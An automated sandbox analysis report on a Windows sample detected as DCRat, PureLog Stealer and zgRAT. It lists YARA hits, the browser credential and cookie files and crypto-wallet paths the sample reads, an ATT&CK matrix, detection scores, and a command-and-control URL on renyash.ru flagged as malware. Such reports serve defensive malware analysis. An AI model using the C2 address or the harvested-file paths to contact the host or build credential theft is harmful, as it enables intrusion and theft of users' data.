Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00DDDF1E

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DCB146 GetVersionExW,

0_2_00DCB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BrokerhostNet.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 5592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 1704, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: gkcQYEdJSO.exe, type: SAMPLE
Source: Yara match	File source: 7.0.BrokerhostNet.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1757730379.0000000006D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756904306.0000000006465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1996952451.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Bridgecontainerserver\BrokerhostNet.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: gkcQYEdJSO.exe, type: SAMPLE
Source: Yara match	File source: 7.0.BrokerhostNet.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Bridgecontainerserver\BrokerhostNet.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: BrokerhostNet.exe, 00000007.00000002.2027859047.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: BrokerhostNet.exe, 00000007.00000002.2027859047.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: gkcQYEdJSO.exe, 00000000.00000003.1757730379.0000000006D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BrokerhostNet.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 5592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe PID: 1704, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: gkcQYEdJSO.exe, type: SAMPLE
Source: Yara match	File source: 7.0.BrokerhostNet.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1757730379.0000000006D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756904306.0000000006465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1996952451.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Bridgecontainerserver\BrokerhostNet.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: gkcQYEdJSO.exe, type: SAMPLE
Source: Yara match	File source: 7.0.BrokerhostNet.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.64b370a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.gkcQYEdJSO.exe.6db070a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Bridgecontainerserver\BrokerhostNet.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	12 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	147 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
gkcQYEdJSO.exe	63%	ReversingLabs	Win32.Trojan.DCRat
gkcQYEdJSO.exe	100%	Avira	VBS/Runner.VPG
gkcQYEdJSO.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat	100%	Avira	BAT/Delbat.C
C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\uznrhtzR.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\cnLmOXeC.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\pXxtswpF.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Bridgecontainerserver\BrokerhostNet.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\foddJTjY.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\NcCXpyPJ.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\WFKNZreq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\aQOwrfcH.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\uznrhtzR.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BxbrKIuG.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\pXxtswpF.log	100%	Joe Sandbox ML
C:\Bridgecontainerserver\BrokerhostNet.exe	100%	Joe Sandbox ML
C:\Bridgecontainerserver\BrokerhostNet.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BxbrKIuG.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\NcCXpyPJ.log	8%	ReversingLabs
C:\Users\user\Desktop\QARGDIci.log	25%	ReversingLabs
C:\Users\user\Desktop\WFKNZreq.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\aQOwrfcH.log	8%	ReversingLabs
C:\Users\user\Desktop\cnLmOXeC.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\foddJTjY.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pXxtswpF.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\utIZHXKr.log	25%	ReversingLabs
C:\Users\user\Desktop\uznrhtzR.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://749858cm.reP:	0%	Avira URL Cloud	safe
http://749858cm.renyash.ru/javascriptrequestApiBasePrivate.php	100%	Avira URL Cloud	malware
http://749858cm.renyash.ru/	100%	Avira URL Cloud	malware
